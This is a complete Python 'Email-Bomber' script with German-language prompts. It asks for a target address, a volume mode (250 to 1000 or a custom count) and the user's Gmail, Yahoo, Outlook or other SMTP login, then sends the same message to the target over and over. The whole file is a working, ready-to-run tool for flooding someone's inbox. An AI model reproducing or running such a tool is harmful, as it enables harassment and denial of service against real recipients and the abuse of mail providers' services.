import sys
import smtplib


class  bcolors:
    GREEN = '\033[92m'
    YELLOW = '\033[93m'
    RED = '\033[91m'

def banner():
    print(bcolors.GREEN + '####################')
    print(bcolors.GREEN + '#------------------#')
    print(bcolors.GREEN + '#---Email-Bomber---#')
    print(bcolors.GREEN + '#---By----Luis-----#')
    print(bcolors.GREEN + '####################')

class Email_Bomber:
    count = 0

    def __init__(self):
        try:
            self.target = str(input(bcolors.YELLOW + 'Ziel -$ '))
            self.mode = int(input(bcolors.YELLOW + 'Modi: (1,2,3,4) || 1:(1000) 2:(500) 3:(250) 4:(x) -$ '))
            if int(self.mode) > int(4) or int(self.mode) < int(1):
                print('ERROR -$ Kein möglicher Modus')
                sys.exit(1)
        except Exception as e:
            print(f'ERROR -$ {e}')

    def bomb(self):
        try:
            print(bcolors.RED + '\nSetup')
            self.amount = None
            if self.mode == int(1):
                self.amount = int(1000)
            elif self.mode == int(2):
                self.amount = int(500)
            elif self.mode == int(3):
                self.amount = int(250)
            else:
                self.amount = int(input(bcolors.GREEN + 'Gib eine Zahl ein -$ '))
            print(bcolors.RED + f'\n{self.mode} und {self.amount}')
        except Exception as e:
            print(f'ERROR -$ {e}')

    def email(self):
        try:
            print(bcolors.RED + '\nSetup')
            self.server = str(input(bcolors.GREEN + 'Email Server 1:Gmail 2:Yahoo 3:Outlook -$ '))
            premade = ['1', '2', '3']
            default_port = True
            if self.server not in premade:
                default_port = False
                self.port = int(input(bcolors.GREEN + 'Port -$ '))

            if default_port == True:
                self.port = int(587)

            if self.server == '1':
                self.server = 'smtp.gmail.com'
            elif self.server == '2':
                self.server = 'smtp.mail.yahoo.com'
            elif self.server == '3':
                self.server = 'smtp-mail.outlook.com'

            self.fromAddr = str(input(bcolors.GREEN + 'Adresse -$ '))
            self.fromPwd = str(input(bcolors.GREEN + 'Passwort -$ '))
            self.subject = str(input(bcolors.GREEN + 'Sub -$ '))
            self.message = str(input(bcolors.GREEN + 'Nachricht -$ '))

            self.msg = '''Von: %s\nAn: %s\nSub: %s\n%s\n
            ''' % (self.fromAddr, self.target, self.subject, self.message)

            self.s = smtplib.SMTP(self.server, self.port)
            self.s.ehlo()
            self.s.starttls()
            self.s.ehlo()
            self.s.login(self.fromAddr, self.fromPwd)
        except Exception as e:
            print(f'ERROR -$ {e}')

    def send(self):
        try:
            self.s.sendmail(self.fromAddr, self.target, self.msg)
            self.count +=1
            print(bcolors.YELLOW + f'BOMB -$ {self.count}')
        except Exception as e:
            print(f'ERROR -$ {e}')

    def attack(self):
        for email in range(self.amount+1):
            self.send()
        self.s.close()
        print(bcolors.RED + '\n')
        sys.exit(0)


if __name__=='__main__':
    banner()
    bomb = Email_Bomber()
    bomb.bomb()
    bomb.email()
    bomb.attack()
